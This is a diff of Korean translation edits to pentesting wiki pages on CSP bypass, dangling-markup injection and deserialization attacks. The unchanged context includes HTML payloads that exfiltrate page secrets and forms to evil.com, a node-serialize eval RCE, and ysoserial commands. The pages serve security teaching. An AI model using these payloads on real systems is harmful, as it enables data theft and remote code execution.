 현대 브라우저는 이미지를 HTML로 변환하여 표시를 향상시키는 것으로 관찰됩니다 (예: 배경 설정, 중앙 정렬 등). 따라서 `favicon.ico` 또는 `robots.txt`와 같은 이미지나 텍스트 파일이 `iframe`을 통해 열리면 HTML로 렌더링됩니다. 특히, 이러한 페이지는 종종 CSP 헤더가 없으며 X-Frame-Options를 포함하지 않을 수 있어, 이로부터 임의의 JavaScript 실행이 가능해집니다:
 ```javascript
@@ -43,7 +43,7 @@ for (var i = 0; i < 5; i++) {
 document.cookie = i + "="
 }
 ```
-언급된 시나리오 중 하나를 트리거한 후, iframe 내에서 JavaScript 실행은 다음과 같이 가능합니다:
+언급된 시나리오 중 하나를 트리거한 후, iframe 내에서 JavaScript 실행은 다음과 같이 가능하다:
 ```javascript
 script = document.createElement("script")
 script.src = "//example.com/csp.js"
diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
index f8b6ff66c..57e2d4e46 100644
--- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
+++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
@@ -4,16 +4,16 @@
 
 ## Resume
 
-이 기술은 **HTML injection이 발견되었을 때** 사용자로부터 정보를 추출하는 데 사용할 수 있습니다. **XSS** [**를 이용할 방법을 찾지 못할 때**](../xss-cross-site-scripting/) 유용하며, **HTML 태그를 주입할 수 있는 경우**에도 유용합니다.\
-또한 **비밀이 HTML에 평문으로 저장되어** 있고 이를 클라이언트에서 **유출**하고 싶거나, 스크립트 실행을 오도하고 싶을 때도 유용합니다.
+이 기술은 **HTML injection이 발견되었을 때** 사용자로부터 정보를 추출하는 데 사용할 수 있습니다. 이는 **XSS** [**를 악용할 방법을 찾지 못할 때**](../xss-cross-site-scripting/) 유용하며, **일부 HTML 태그를 주입할 수 있는 경우**에 매우 유용합니다.\
+또한 **비밀이 HTML에 평문으로 저장되어** 있고 이를 클라이언트에서 **유출**하고 싶거나, 일부 스크립트 실행을 오도하고 싶을 때도 유용합니다.
 
-여기에서 언급된 여러 기술은 정보를 예상치 못한 방식(HTML 태그, CSS, http-meta 태그, 폼, base 등)으로 유출하여 일부 [**Content Security Policy**](../content-security-policy-csp-bypass/)를 우회하는 데 사용할 수 있습니다.
+여기에서 언급된 여러 기술은 정보를 예상치 못한 방식으로 유출하여 일부 [**Content Security Policy**](../content-security-policy-csp-bypass/)를 우회하는 데 사용할 수 있습니다 (html 태그, CSS, http-meta 태그, 폼, base...).
 
 ## Main Applications
 
 ### Stealing clear text secrets
 
-페이지가 로드될 때 `<img src='http://evil.com/log.cgi?`를 주입하면 피해자는 주입된 `img` 태그와 코드 내의 다음 인용부호 사이의 모든 코드를 전송합니다. 만약 그 조각에 비밀이 포함되어 있다면, 당신은 그것을 훔칠 수 있습니다(더블 쿼트를 사용하여 같은 작업을 수행할 수 있으며, 어떤 것이 더 흥미로울지 살펴보세요).
+페이지가 로드될 때 `<img src='http://evil.com/log.cgi?`를 주입하면 피해자는 주입된 `img` 태그와 코드 내의 다음 인용부호 사이의 모든 코드를 전송합니다. 만약 그 조각에 비밀이 포함되어 있다면, 당신은 그것을 훔칠 수 있습니다(더블 인용부호를 사용하여 같은 작업을 수행할 수 있으며, 어떤 것이 더 흥미로울지 살펴보세요).
 
 `img` 태그가 금지된 경우(CSP 때문일 수 있음) `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`를 사용할 수도 있습니다.
 ```html
@@ -32,7 +32,7 @@ CSS `@import`를 악용할 수도 있습니다(세미콜론(";")을 찾을 때
 ```html
 <table background='//your-collaborator-id.burpcollaborator.net?'
 ```
-당신은 또한 `<base` 태그를 삽입할 수 있습니다. 모든 정보는 인용이 닫힐 때까지 전송되지만 일부 사용자 상호작용이 필요합니다(사용자가 링크를 클릭해야 합니다. 왜냐하면 base 태그가 링크가 가리키는 도메인을 변경했기 때문입니다):
+당신은 또한 `<base` 태그를 삽입할 수 있습니다. 모든 정보는 인용이 닫힐 때까지 전송되지만 일부 사용자 상호작용이 필요합니다(사용자가 링크를 클릭해야 하며, 기본 태그가 링크가 가리키는 도메인을 변경했기 때문입니다):
 ```html
 <base target='        <--- Injected
 steal me'<b>test</b>
@@ -41,15 +41,15 @@ steal me'<b>test</b>
 ```html
 <base href="http://evil.com/" />
 ```
-그런 다음, 데이터를 경로로 보내는 양식(`<form action='update_profile.php'>`)은 악의적인 도메인으로 데이터를 보냅니다.
+그런 다음, 데이터를 경로로 보내는 폼(`<form action='update_profile.php'>`)은 악성 도메인으로 데이터를 보냅니다.
 
-### 양식 훔치기 2
+### 폼 훔치기 2
 
-양식 헤더 설정: `<form action='http://evil.com/log_steal'>` 이렇게 하면 다음 양식 헤더가 덮어쓰여지고 양식의 모든 데이터가 공격자에게 전송됩니다.
+폼 헤더를 설정합니다: `<form action='http://evil.com/log_steal'>` 이렇게 하면 다음 폼 헤더가 덮어쓰여지고 폼의 모든 데이터가 공격자에게 전송됩니다.
 
-### 양식 훔치기 3
+### 폼 훔치기 3
 
-버튼은 "formaction" 속성을 사용하여 정보가 전송될 URL을 변경할 수 있습니다.
+버튼은 "formaction" 속성을 사용하여 정보가 전송될 URL을 변경할 수 있습니다:
 ```html
 <button name="xss" type="submit" formaction="https://google.com">
 I get consumed!
@@ -59,15 +59,15 @@ I get consumed!
 
 [**이 공격의 예를 이 문서에서 찾으세요**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp).
 
-### 명확한 텍스트 비밀 훔치기 2
+### 평문 비밀 훔치기 2
 
 가장 최근에 언급된 기술을 사용하여 양식을 훔치고 (새 양식 헤더 주입) 새로운 입력 필드를 주입할 수 있습니다:
 ```html
 <input type='hidden' name='review_body' value="
 ```
-이 입력 필드는 HTML에서 이중 따옴표 사이의 모든 콘텐츠와 다음 이중 따옴표 사이의 콘텐츠를 포함합니다. 이 공격은 "_**명확한 텍스트 비밀 훔치기**_"와 "_**양식 훔치기2**_"를 혼합합니다.
+이 입력 필드는 HTML에서 이중 따옴표 사이의 모든 내용을 다음 이중 따옴표까지 포함합니다. 이 공격은 "_**명확한 텍스트 비밀 훔치기**_"와 "_**양식 훔치기2**_"를 혼합합니다.
 
-폼과 `<option>` 태그를 주입하여 동일한 작업을 수행할 수 있습니다. 닫힌 `</option>`이 발견될 때까지 모든 데이터가 전송됩니다:
+폼과 `<option>` 태그를 주입하여 같은 작업을 수행할 수 있습니다. 닫힌 `</option>`이 발견될 때까지 모든 데이터가 전송됩니다:
 ```html
 <form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
 ```
@@ -86,11 +86,11 @@ I get consumed!
 </form>
 </form>
 ```
-### 노스크립트를 통한 평문 비밀 훔치기
+### noscript를 통한 평문 비밀 훔치기
 
-`<noscript></noscript>`는 브라우저가 자바스크립트를 지원하지 않을 경우 그 내용을 해석하는 태그입니다 (Chrome에서 자바스크립트를 [chrome://settings/content/javascript](chrome://settings/content/javascript)에서 활성화/비활성화할 수 있습니다).
+`<noscript></noscript>`는 브라우저가 자바스크립트를 지원하지 않을 경우 그 내용을 해석하는 태그입니다 (Chrome에서 자바스크립트를 활성화/비활성화할 수 있습니다: [chrome://settings/content/javascript](chrome://settings/content/javascript)).
 
-공격자가 제어하는 사이트로 주입 지점에서 페이지의 내용을 하단까지 유출하는 방법은 다음을 주입하는 것입니다:
+공격자가 제어하는 사이트로 주입 지점에서 하단까지 웹 페이지의 내용을 유출하는 방법은 다음을 주입하는 것입니다:
 ```html
 <noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
 ```
@@ -161,9 +161,9 @@ top.window.location = "https://attacker.com/hacked.html"
 </body>
 </html>
 ```
-이것은 `sandbox=' allow-scripts allow-top-navigation'`와 같은 것으로 완화할 수 있습니다.
+이것은 다음과 같은 방법으로 완화할 수 있습니다: `sandbox=' allow-scripts allow-top-navigation'`
 
-iframe은 **iframe name 속성**을 사용하여 다른 페이지에서 민감한 정보를 유출하는 데 악용될 수 있습니다. 이는 HTML 주입을 악용하여 **민감한 정보가 iframe name 속성 안에 나타나게 하는** iframe을 생성할 수 있기 때문이며, 그런 다음 초기 iframe에서 해당 이름에 접근하여 유출할 수 있습니다.
+iframe은 또한 **iframe name 속성**을 사용하여 다른 페이지에서 민감한 정보를 유출하는 데 악용될 수 있습니다. 이는 HTML 주입을 악용하여 **민감한 정보가 iframe name 속성 안에 나타나게 하는** iframe을 생성할 수 있기 때문이며, 그런 다음 초기 iframe에서 해당 이름에 접근하여 유출할 수 있습니다.
 ```html
 <script>
 function cspBypass(win) {
@@ -180,9 +180,9 @@ onload="cspBypass(this.contentWindow)"></iframe>
 
 ### \<meta 남용
 
-**`meta http-equiv`**를 사용하여 쿠키 설정: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` 또는 리디렉션 수행(이 경우 5초 후): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`와 같은 **여러 작업**을 수행할 수 있습니다.
+**`meta http-equiv`**를 사용하여 쿠키 설정과 같은 **여러 작업**을 수행할 수 있습니다: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` 또는 리디렉션을 수행할 수 있습니다(이 경우 5초 후): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
 
-이는 **http-equiv**에 대한 **CSP**로 **회피**할 수 있습니다 ( `Content-Security-Policy: default-src 'self';`, 또는 `Content-Security-Policy: http-equiv 'self';`)
+이는 **http-equiv**에 대한 **CSP**로 **피할 수 있습니다** (`Content-Security-Policy: default-src 'self';`, 또는 `Content-Security-Policy: http-equiv 'self';`)
 
 ### 새로운 \<portal HTML 태그
 
@@ -193,7 +193,7 @@ onload="cspBypass(this.contentWindow)"></iframe>
 ```
 ### HTML 누수
 
-HTML에서 연결성을 누출하는 모든 방법이 Dangling Markup에 유용하지는 않지만, 때때로 도움이 될 수 있습니다. 여기에서 확인하세요: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
+HTML에서 연결성을 누수하는 모든 방법이 Dangling Markup에 유용하지는 않지만, 때때로 도움이 될 수 있습니다. 여기에서 확인하세요: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
 
 ## SS-Leaks
 
diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md
index 97173570e..c7d87fc1c 100644
--- a/src/pentesting-web/deserialization/README.md
+++ b/src/pentesting-web/deserialization/README.md
@@ -18,7 +18,7 @@ PHP에서는 직렬화 및 역직렬화 과정에서 특정 매직 메서드가
 - `__wakeup`: 객체가 역직렬화될 때 호출됩니다. 이는 직렬화 중에 손실된 데이터베이스 연결을 재설정하고 다른 재초기화 작업을 수행하는 데 사용됩니다.
 - `__unserialize`: 이 메서드는 객체가 역직렬화될 때 `__wakeup` 대신 호출됩니다(존재하는 경우). 이는 `__wakeup`에 비해 역직렬화 과정에 대한 더 많은 제어를 제공합니다.
 - `__destruct`: 이 메서드는 객체가 파괴되기 직전이나 스크립트가 끝날 때 호출됩니다. 일반적으로 파일 핸들이나 데이터베이스 연결을 닫는 등의 정리 작업에 사용됩니다.
-- `__toString`: 이 메서드는 객체를 문자열로 취급할 수 있게 해줍니다. 이는 파일을 읽거나 그 안의 함수 호출에 기반한 다른 작업을 수행하는 데 사용될 수 있으며, 효과적으로 객체의 텍스트 표현을 제공합니다.
+- `__toString`: 이 메서드는 객체를 문자열로 취급할 수 있게 해줍니다. 이는 파일을 읽거나 그 안의 함수 호출에 기반한 다른 작업에 사용될 수 있으며, 객체의 텍스트 표현을 효과적으로 제공합니다.
 ```php
 <?php
 class test {
@@ -74,7 +74,7 @@ This is a test<br />
 */
 ?>
 ```
-결과를 보면 객체가 역직렬화될 때 **`__wakeup`** 및 **`__destruct`** 함수가 호출되는 것을 알 수 있습니다. 여러 튜토리얼에서 **`__toString`** 함수가 일부 속성을 출력하려고 할 때 호출된다고 하지만, 현재는 **더 이상 그렇지 않은 것 같습니다**.
+결과를 보면 객체가 역직렬화될 때 **`__wakeup`** 및 **`__destruct`** 함수가 호출된다는 것을 알 수 있습니다. 여러 튜토리얼에서 **`__toString`** 함수가 일부 속성을 출력하려고 할 때 호출된다고 하지만, 현재는 **더 이상 발생하지 않는 것 같습니다**.
 
 > [!WARNING]
 > 클래스에 구현된 경우 **`__unserialize(array $data)`** 메서드가 **`__wakeup()`** 대신 호출됩니다. 이 메서드는 직렬화된 데이터를 배열로 제공하여 객체를 역직렬화할 수 있게 해줍니다. 이 메서드를 사용하여 속성을 역직렬화하고 역직렬화 시 필요한 작업을 수행할 수 있습니다.
@@ -118,7 +118,7 @@ $ser=serialize($o);
 ### PHPGGC (ysoserial for PHP)
 
 [**PHPGGC**](https://github.com/ambionics/phpggc)는 PHP 역직렬화를 악용하기 위한 페이로드를 생성하는 데 도움을 줄 수 있습니다.\
-응용 프로그램의 소스 코드에서 역직렬화를 악용할 방법을 **찾을 수 없는 경우가 많습니다**. 그러나 **외부 PHP 확장 코드**를 악용할 수 있을지도 모릅니다.\
+응용 프로그램의 소스 코드에서 역직렬화를 악용할 방법을 **찾을 수 없는 경우가 많습니다**. 그러나 **외부 PHP 확장의 코드를 악용할 수 있을지도 모릅니다.**\
 따라서 가능하다면 서버의 `phpinfo()`를 확인하고 **인터넷에서 검색**(심지어 **PHPGGC의 가젯**에서도)하여 악용할 수 있는 가능한 가젯을 찾아보세요.
 
 ### phar:// 메타데이터 역직렬화
@@ -172,7 +172,7 @@ python-yaml-deserialization.md
 JS는 객체를 생성하기 위해 단순히 실행되는 **"마법" 함수**가 없습니다. 그러나 **`toString`**, **`valueOf`**, **`toJSON`**과 같이 **직접 호출하지 않고도 자주 사용되는** **함수**가 있습니다.\
 역직렬화를 악용하는 경우 이러한 함수를 **타협하여 다른 코드를 실행**할 수 있으며(프로토타입 오염을 악용할 가능성 있음) 호출될 때 임의의 코드를 실행할 수 있습니다.
 
-함수를 직접 호출하지 않고 호출하는 또 다른 **"마법" 방법**은 **비동기 함수**(프라미스)에서 반환된 객체를 **타협하는 것**입니다. 왜냐하면, 그 **반환 객체**를 **"then"이라는 함수형 속성을 가진 다른 **프라미스**로 **변환**하면, 다른 프라미스에 의해 반환되기 때문에 **실행**됩니다. _자세한 정보는_ [_**이 링크**_](https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/) _를 따르십시오._
+함수를 직접 호출하지 않고 호출하는 또 다른 **"마법" 방법**은 **비동기 함수**(프라미스)에서 반환된 객체를 **타협하는 것**입니다. 왜냐하면, 그 **반환 객체**를 **"then"이라는 함수형 속성**을 가진 다른 **프라미스**로 **변환**하면, 다른 프라미스에 의해 반환되었기 때문에 **실행**됩니다. _자세한 정보는_ [_**이 링크**_](https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/) _를 따르십시오._
 ```javascript
 // If you can compromise p (returned object) to be a promise
 // it will be executed just because it's the return object of an async function:
@@ -225,7 +225,7 @@ console.log("Serialized: \n" + payload_serialized)
 ```
 예제에서 볼 수 있듯이, 함수가 직렬화될 때 `_$$ND_FUNC$$_` 플래그가 직렬화된 객체에 추가됩니다.
 
-파일 `node-serialize/lib/serialize.js` 안에서 같은 플래그와 코드가 그것을 어떻게 사용하는지 찾을 수 있습니다.
+`node-serialize/lib/serialize.js` 파일 안에서 같은 플래그와 코드가 이를 어떻게 사용하는지 찾을 수 있습니다.
 
 ![](<../../images/image (351).png>)
 
@@ -233,9 +233,9 @@ console.log("Serialized: \n" + payload_serialized)
 
 마지막 코드 조각에서 볼 수 있듯이, **플래그가 발견되면** `eval`이 사용되어 함수를 역직렬화하므로 기본적으로 **사용자 입력이 `eval` 함수 안에서 사용됩니다**.
 
-하지만, **함수를 단순히 직렬화하는 것만으로는** 그것이 실행되지 않습니다. 왜냐하면 코드의 일부가 **우리의 예제에서 `y.rce`를 호출해야 하기 때문이며, 이는 매우 **가능성이 낮습니다**.\
-어쨌든, **직렬화된 객체를 수정하여** **괄호를 추가함으로써** 객체가 역직렬화될 때 직렬화된 함수가 자동으로 실행되도록 할 수 있습니다.\
-다음 코드 조각에서 **마지막 괄호**와 `unserialize` 함수가 코드를 자동으로 실행하는 방법에 주목하세요:
+하지만, **함수를 단순히 직렬화하는 것만으로는** 실행되지 않으며, 우리 예제에서 **어떤 코드가 `y.rce`를 호출해야** 하므로 이는 매우 **가능성이 낮습니다**.\
+어쨌든, **직렬화된 객체를 수정하여** **괄호를 추가**하면 객체가 역직렬화될 때 직렬화된 함수가 자동으로 실행되도록 할 수 있습니다.\
+다음 코드 조각에서 **마지막 괄호**와 `unserialize` 함수가 코드를 자동으로 실행하는 방식을 주목하세요:
 ```javascript
 var serialize = require("node-serialize")
 var test = {
@@ -254,7 +254,7 @@ serialize.unserialize(test)
 
 ### [funcster](https://www.npmjs.com/package/funcster)
 
-**funcster**의 주목할 만한 측면은 **표준 내장 객체**에 대한 접근 불가능성입니다. 이들은 접근 가능한 범위를 벗어납니다. 이 제한으로 인해 내장 객체에서 메서드를 호출하려는 코드 실행이 방지되어, `console.log()`나 `require(something)`와 같은 명령을 사용할 때 `"ReferenceError: console is not defined"`와 같은 예외가 발생합니다.
+**funcster**의 주목할 만한 측면은 **표준 내장 객체**에 대한 접근 불가능성입니다. 이들은 접근 가능한 범위를 벗어납니다. 이 제한으로 인해 내장 객체에서 메서드를 호출하려는 코드 실행이 방지되어, `console.log()` 또는 `require(something)`와 같은 명령을 사용할 때 `"ReferenceError: console is not defined"`와 같은 예외가 발생합니다.
 
 이 제한에도 불구하고, 특정 접근 방식을 통해 모든 표준 내장 객체를 포함한 전역 컨텍스트에 대한 전체 접근을 복원하는 것이 가능합니다. 전역 컨텍스트를 직접 활용함으로써 이 제한을 우회할 수 있습니다. 예를 들어, 다음 스니펫을 사용하여 접근을 재설정할 수 있습니다:
 ```javascript
@@ -328,7 +328,7 @@ Java에서는 **역직렬화 콜백이 역직렬화 과정 중에 실행됩니
 
 - 외부 사용자가 정의한 매개변수와 함께 사용되는 `XMLDecoder`.
 - XStream 버전이 1.46 이하인 경우, 직렬화 문제에 취약한 `XStream`의 `fromXML` 메서드.
-- `readObject` 메서드와 결합된 `ObjectInputStream`.
+- `readObject` 메서드와 함께 사용되는 `ObjectInputStream`.
 - `readObject`, `readObjectNodData`, `readResolve`, 또는 `readExternal`과 같은 메서드의 구현.
 - `ObjectInputStream.readUnshared`.
 - `Serializable`의 일반적인 사용.
@@ -376,8 +376,8 @@ Java Deserialization Scanner는 **`ObjectInputStream`** deserialization에 중
 
 **직렬화 테스트**
 
-서버에서 취약한 라이브러리가 사용되고 있는지 확인하는 것만이 전부는 아닙니다. 때때로 **직렬화된 객체 내부의 데이터를 변경하고 일부 검사를 우회할 수 있습니다**(웹 애플리케이션 내에서 관리자 권한을 부여할 수도 있습니다).\
-웹 애플리케이션에 전송되는 자바 직렬화 객체를 발견하면, **[**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper)**를 사용하여 전송되는 직렬화 객체를 더 읽기 쉬운 형식으로 출력할 수 있습니다. 어떤 데이터를 전송하고 있는지 알면 이를 수정하고 일부 검사를 우회하기가 더 쉬워질 것입니다.
+서버에서 취약한 라이브러리가 사용되는지 확인하는 것만이 전부는 아닙니다. 때때로 **직렬화된 객체 내부의 데이터를 변경하고 일부 검사를 우회할 수 있습니다**(웹 애플리케이션 내에서 관리자 권한을 부여할 수 있습니다).\
+웹 애플리케이션으로 전송되는 자바 직렬화 객체를 발견하면, **[**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper)**를 사용하여 전송되는 직렬화 객체를 더 인간이 읽기 쉬운 형식으로 출력할 수 있습니다. 어떤 데이터를 전송하고 있는지 알면 이를 수정하고 일부 검사를 우회하기가 더 쉬워질 것입니다.
 
 ### **익스플로잇**
 
@@ -430,9 +430,9 @@ java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb
 # Base64 encode payload in base64
 base64 -w0 payload
 ```
-**java.lang.Runtime.exec()**에 대한 페이로드를 생성할 때, 실행의 출력을 리디렉션하기 위해 ">" 또는 "|"와 같은 **특수 문자를 사용할 수 없으며**, 명령을 실행하기 위해 "$()"를 사용할 수 없고, **공백**으로 구분된 **인수를** 명령에 전달할 수도 없습니다 (예: `echo -n "hello world"`는 가능하지만 `python2 -c 'print "Hello world"'`는 불가능합니다). 페이로드를 올바르게 인코딩하기 위해 [이 웹페이지](http://www.jackson-t.ca/runtime-exec-payloads.html)를 사용할 수 있습니다.
+**java.lang.Runtime.exec()**에 대한 페이로드를 생성할 때 ">" 또는 "|"와 같은 **특수 문자를 사용할 수 없습니다**. 실행의 출력을 리디렉션하거나, "$()"를 사용하여 명령을 실행하거나, 심지어 **공백으로 구분된 인수를 명령에 전달할 수 없습니다** (예: `echo -n "hello world"`는 가능하지만 `python2 -c 'print "Hello world"'`는 불가능합니다). 페이로드를 올바르게 인코딩하기 위해 [이 웹페이지](http://www.jackson-t.ca/runtime-exec-payloads.html)를 사용할 수 있습니다.
 
-다음 스크립트를 사용하여 Windows와 Linux에 대한 **모든 가능한 코드 실행** 페이로드를 생성한 후, 취약한 웹 페이지에서 테스트해 보세요:
+다음 스크립트를 사용하여 Windows와 Linux에 대한 **모든 가능한 코드 실행** 페이로드를 생성한 후 취약한 웹 페이지에서 테스트해 보세요:
 ```python
 import os
 import base64
@@ -475,7 +475,7 @@ You can **use** [**https://github.com/pwntester/SerialKillerBypassGadgetCollecti
 <type>pom</type>
 </dependency>
 ```
-**Maven을 설치하고**, **프로젝트를 컴파일합니다**:
+**Maven을 설치하고**, **프로젝트를 컴파일**하세요:
 ```bash
 sudo apt-get install maven
 mvn clean package -DskipTests
@@ -512,7 +512,7 @@ private transient double margin; // declared transient
 ```
 #### Serializable을 구현해야 하는 클래스의 직렬화를 피하십시오
 
-특정 **객체가 클래스 계층 구조로 인해 `Serializable`** 인터페이스를 구현해야 하는 시나리오에서는 의도하지 않은 역직렬화의 위험이 있습니다. 이를 방지하기 위해, 아래와 같이 항상 예외를 발생시키는 `final` `readObject()` 메서드를 정의하여 이러한 객체가 역직렬화되지 않도록 하십시오:
+특정 **객체가 클래스 계층 구조로 인해 `Serializable`** 인터페이스를 구현해야 하는 시나리오에서는 의도하지 않은 역직렬화의 위험이 있습니다. 이를 방지하기 위해, 아래와 같이 항상 예외를 발생시키는 `final` `readObject()` 메서드를 정의하여 이러한 객체가 역직렬화되지 않도록 해야 합니다:
 ```java
 private final void readObject(ObjectInputStream in) throws java.io.IOException {
 throw new java.io.IOException("Cannot be deserialized");
@@ -571,7 +571,7 @@ ObjectInputFilter.Config.setSerialFilter(filter);
 **외부 라이브러리를 활용한 보안 강화**: **NotSoSerial**, **jdeserialize**, 및 **Kryo**와 같은 라이브러리는 Java 역직렬화를 제어하고 모니터링하기 위한 고급 기능을 제공합니다. 이러한 라이브러리는 클래스의 화이트리스트 또는 블랙리스트 작성, 역직렬화 전에 직렬화된 객체 분석, 사용자 정의 직렬화 전략 구현과 같은 추가 보안 계층을 제공할 수 있습니다.
 
 - **NotSoSerial**은 신뢰할 수 없는 코드의 실행을 방지하기 위해 역직렬화 프로세스를 가로챕니다.
-- **jdeserialize**는 역직렬화 없이 직렬화된 Java 객체를 분석할 수 있게 하여 잠재적으로 악의적인 콘텐츠를 식별하는 데 도움을 줍니다.
+- **jdeserialize**는 역직렬화하지 않고도 직렬화된 Java 객체를 분석할 수 있게 하여 잠재적으로 악의적인 콘텐츠를 식별하는 데 도움을 줍니다.
 - **Kryo**는 속도와 효율성을 강조하는 대체 직렬화 프레임워크로, 보안을 강화할 수 있는 구성 가능한 직렬화 전략을 제공합니다.
 
 ### 참고 문헌
@@ -590,7 +590,7 @@ ObjectInputFilter.Config.setSerialFilter(filter);
 
 ## JNDI 인젝션 및 log4Shell
 
-**JNDI 인젝션, RMI, CORBA 및 LDAP를 통한 악용 방법 및 log4shell의 취약점 예시**에 대한 내용은 다음 페이지에서 확인하세요:
+**JNDI 인젝션이란 무엇인지, RMI, CORBA 및 LDAP를 통해 이를 악용하는 방법, log4shell을 이용한 공격 방법**에 대한 내용은 다음 페이지에서 확인할 수 있습니다:
 
 {{#ref}}
 jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -610,12 +610,12 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 ### 악용
 
-기본적으로 **위험한 방식으로 JMS를 사용하는 서비스가 많이 있습니다**. 따라서 이러한 서비스에 메시지를 전송할 **충분한 권한**이 있다면 (일반적으로 유효한 자격 증명이 필요함) **소비자/구독자가 역직렬화할 악의적인 직렬화 객체를 전송할 수 있습니다**.\
-이는 이 악용에서 **해당 메시지를 사용할 모든 클라이언트가 감염될 것**임을 의미합니다.
+기본적으로 **위험한 방식으로 JMS를 사용하는 서비스가 많이 있습니다**. 따라서 이러한 서비스에 메시지를 전송할 **충분한 권한**이 있다면(일반적으로 유효한 자격 증명이 필요함) **소비자/구독자가 역직렬화할 악의적인 직렬화 객체를 전송할 수 있습니다**.\
+이는 이 악용에서 **해당 메시지를 사용할 모든 클라이언트가 감염될 것임을 의미합니다**.
 
-서비스가 취약하더라도 (사용자 입력을 안전하지 않게 역직렬화하기 때문에) 여전히 취약점을 악용하기 위한 유효한 가젯을 찾아야 한다는 점을 기억해야 합니다.
+서비스가 취약하더라도(사용자 입력을 안전하지 않게 역직렬화하는 경우) 여전히 취약점을 악용하기 위한 유효한 가젯을 찾아야 한다는 점을 기억해야 합니다.
 
-도구 [JMET](https://github.com/matthiaskaiser/jmet)는 **알려진 가젯을 사용하여 여러 악의적인 직렬화 객체를 전송하는 서비스를 연결하고 공격하기 위해 생성되었습니다**. 이러한 악용은 서비스가 여전히 취약하고 사용된 가젯 중 하나가 취약한 애플리케이션 내에 있을 경우 작동합니다.
+도구 [JMET](https://github.com/matthiaskaiser/jmet)는 **알려진 가젯을 사용하여 여러 악의적인 직렬화 객체를 전송하는 서비스에 연결하고 공격하기 위해 생성되었습니다**. 이러한 악용은 서비스가 여전히 취약하고 사용된 가젯 중 하나가 취약한 애플리케이션 내에 있을 경우에 작동합니다.
 
 ### 참고 문헌
 
@@ -624,7 +624,7 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 ## .Net
 
-.Net의 맥락에서 역직렬화 악용은 Java에서 발견되는 방식과 유사하게 작동하며, 가젯을 악용하여 객체의 역직렬화 중 특정 코드를 실행합니다.
+.Net의 맥락에서 역직렬화 악용은 Java에서 발견되는 방식과 유사하게 작동하며, 가젯을 악용하여 객체의 역직렬화 중에 특정 코드를 실행합니다.
 
 ### 지문
 
@@ -635,7 +635,7 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 1. `TypeNameHandling`
 2. `JavaScriptTypeResolver`
 
-사용자 제어 하에 변수에 의해 유형이 결정될 수 있는 직렬화기에 초점을 맞춰야 합니다.
+사용자 제어 하에 변수에 의해 유형이 결정될 수 있는 직렬 변환기에 초점을 맞춰야 합니다.
 
 #### 블랙박스
 
@@ -649,18 +649,18 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 **ysoserial.net**의 주요 옵션은: **`--gadget`**, **`--formatter`**, **`--output`** 및 **`--plugin`**입니다.
 
-- **`--gadget`**는 악용할 가젯을 지정하는 데 사용됩니다 (역직렬화 중 명령을 실행하기 위해 악용될 클래스/함수를 지정).
-- **`--formatter`**는 악용을 직렬화하는 방법을 지정하는 데 사용됩니다 (페이로드를 역직렬화하는 데 사용되는 백엔드 라이브러리를 알아야 하며, 동일한 라이브러리를 사용하여 직렬화해야 합니다).
-- **`--output`**는 악용을 **원시** 또는 **base64** 인코딩으로 원하는지 지정하는 데 사용됩니다. _**ysoserial.net**은 페이로드를 **UTF-16LE**로 **인코딩**하므로 (Windows에서 기본적으로 사용되는 인코딩) 원시 데이터를 가져와 리눅스 콘솔에서 인코딩하면 **인코딩 호환성 문제**가 발생할 수 있으며, 이는 악용이 제대로 작동하지 않게 할 수 있습니다 (HTB JSON 박스에서는 페이로드가 UTF-16LE와 ASCII 모두에서 작동했지만, 항상 작동한다는 의미는 아닙니다)._
+- **`--gadget`**는 악용할 가젯을 지정하는 데 사용됩니다(역직렬화 중 명령을 실행하기 위해 악용될 클래스/함수를 지정).
+- **`--formatter`**는 악용을 직렬화하는 방법을 지정하는 데 사용됩니다(페이로드를 역직렬화하는 데 사용되는 백엔드 라이브러리를 알아야 하며, 이를 직렬화하는 데 동일한 것을 사용해야 합니다).
+- **`--output`**는 악용을 **원시** 또는 **base64** 인코딩으로 원하는지 지정하는 데 사용됩니다. _**ysoserial.net**은 페이로드를 **UTF-16LE**(Windows에서 기본적으로 사용되는 인코딩)로 **인코딩**하므로, 원시 데이터를 가져와 리눅스 콘솔에서 인코딩하면 **인코딩 호환성 문제**가 발생할 수 있으며, 이는 악용이 제대로 작동하지 않게 할 수 있습니다(HTB JSON 박스에서는 페이로드가 UTF-16LE와 ASCII 모두에서 작동했지만, 이는 항상 작동한다는 의미는 아닙니다)._
 - **`--plugin`** ysoserial.net은 ViewState와 같은 **특정 프레임워크를 위한 악용을 제작하기 위해 플러그인을 지원합니다**.
 
 #### ysoserial.net의 추가 매개변수
 
-- `--minify`는 **더 작은 페이로드**를 제공합니다 (가능한 경우).
+- `--minify`는 **더 작은 페이로드**를 제공합니다(가능한 경우).
 - `--raf -f Json.Net -c "anything"` 이는 제공된 포맷터(`Json.Net`인 경우)와 함께 사용할 수 있는 모든 가젯을 나타냅니다.
